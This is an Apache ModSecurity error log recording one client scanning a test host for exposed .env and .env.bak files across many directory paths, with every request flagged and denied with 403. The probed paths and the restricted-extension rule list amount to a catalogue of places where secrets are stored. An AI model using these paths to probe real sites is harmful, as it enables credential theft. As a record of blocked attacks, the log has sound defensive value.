[Tue Mar 03 00:28:38.050678 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aaYdJuruS4pGkRBADB1TpgAAAAM"]
[Tue Mar 03 00:28:38.050930 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aaYdJuruS4pGkRBADB1TpgAAAAM"]
[Tue Mar 03 00:28:38.051108 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aaYdJuruS4pGkRBADB1TpgAAAAM"]
[Tue Mar 03 00:28:38.339440 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aaYdJuruS4pGkRBADB1TpwAAAAM"]
[Tue Mar 03 00:28:38.339668 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aaYdJuruS4pGkRBADB1TpwAAAAM"]
[Tue Mar 03 00:28:38.339872 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aaYdJuruS4pGkRBADB1TpwAAAAM"]
[Tue Mar 03 00:28:38.571727 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aaYdJuruS4pGkRBADB1TqAAAAAM"]
[Tue Mar 03 00:28:38.571958 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aaYdJuruS4pGkRBADB1TqAAAAAM"]
[Tue Mar 03 00:28:38.572143 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aaYdJuruS4pGkRBADB1TqAAAAAM"]
[Tue Mar 03 00:28:38.782522 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aaYdJuruS4pGkRBADB1TqQAAAAM"]
[Tue Mar 03 00:28:38.782747 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aaYdJuruS4pGkRBADB1TqQAAAAM"]
[Tue Mar 03 00:28:38.782931 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aaYdJuruS4pGkRBADB1TqQAAAAM"]
[Tue Mar 03 00:28:39.094004 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TqgAAAAM"]
[Tue Mar 03 00:28:39.094233 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TqgAAAAM"]
[Tue Mar 03 00:28:39.094457 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TqgAAAAM"]
[Tue Mar 03 00:28:39.317455 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TqwAAAAM"]
[Tue Mar 03 00:28:39.317690 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TqwAAAAM"]
[Tue Mar 03 00:28:39.317907 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TqwAAAAM"]
[Tue Mar 03 00:28:39.714195 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TrAAAAAM"]
[Tue Mar 03 00:28:39.714439 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TrAAAAAM"]
[Tue Mar 03 00:28:39.714637 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TrAAAAAM"]
[Tue Mar 03 00:28:39.942853 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TrQAAAAM"]
[Tue Mar 03 00:28:39.943077 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TrQAAAAM"]
[Tue Mar 03 00:28:39.943262 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aaYdJ-ruS4pGkRBADB1TrQAAAAM"]
[Tue Mar 03 00:28:40.307461 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aaYdKOruS4pGkRBADB1TrgAAAAM"]
[Tue Mar 03 00:28:40.307686 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aaYdKOruS4pGkRBADB1TrgAAAAM"]
[Tue Mar 03 00:28:40.307876 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aaYdKOruS4pGkRBADB1TrgAAAAM"]
[Tue Mar 03 00:28:40.564203 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aaYdKOruS4pGkRBADB1TrwAAAAM"]
[Tue Mar 03 00:28:40.564432 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aaYdKOruS4pGkRBADB1TrwAAAAM"]
[Tue Mar 03 00:28:40.564625 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aaYdKOruS4pGkRBADB1TrwAAAAM"]
[Tue Mar 03 00:28:40.834095 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aaYdKOruS4pGkRBADB1TsAAAAAM"]
[Tue Mar 03 00:28:40.834321 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aaYdKOruS4pGkRBADB1TsAAAAAM"]
[Tue Mar 03 00:28:40.834541 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aaYdKOruS4pGkRBADB1TsAAAAAM"]
[Tue Mar 03 00:28:42.413003 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aaYdKv54XEVQxqhpP2KWkgAAAAQ"]
[Tue Mar 03 00:28:42.413225 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aaYdKv54XEVQxqhpP2KWkgAAAAQ"]
[Tue Mar 03 00:28:42.413394 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aaYdKv54XEVQxqhpP2KWkgAAAAQ"]
[Tue Mar 03 00:28:43.710484 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aaYdK_54XEVQxqhpP2KWkwAAAAQ"]
[Tue Mar 03 00:28:43.710651 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aaYdK_54XEVQxqhpP2KWkwAAAAQ"]
[Tue Mar 03 00:28:43.710863 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aaYdK_54XEVQxqhpP2KWkwAAAAQ"]
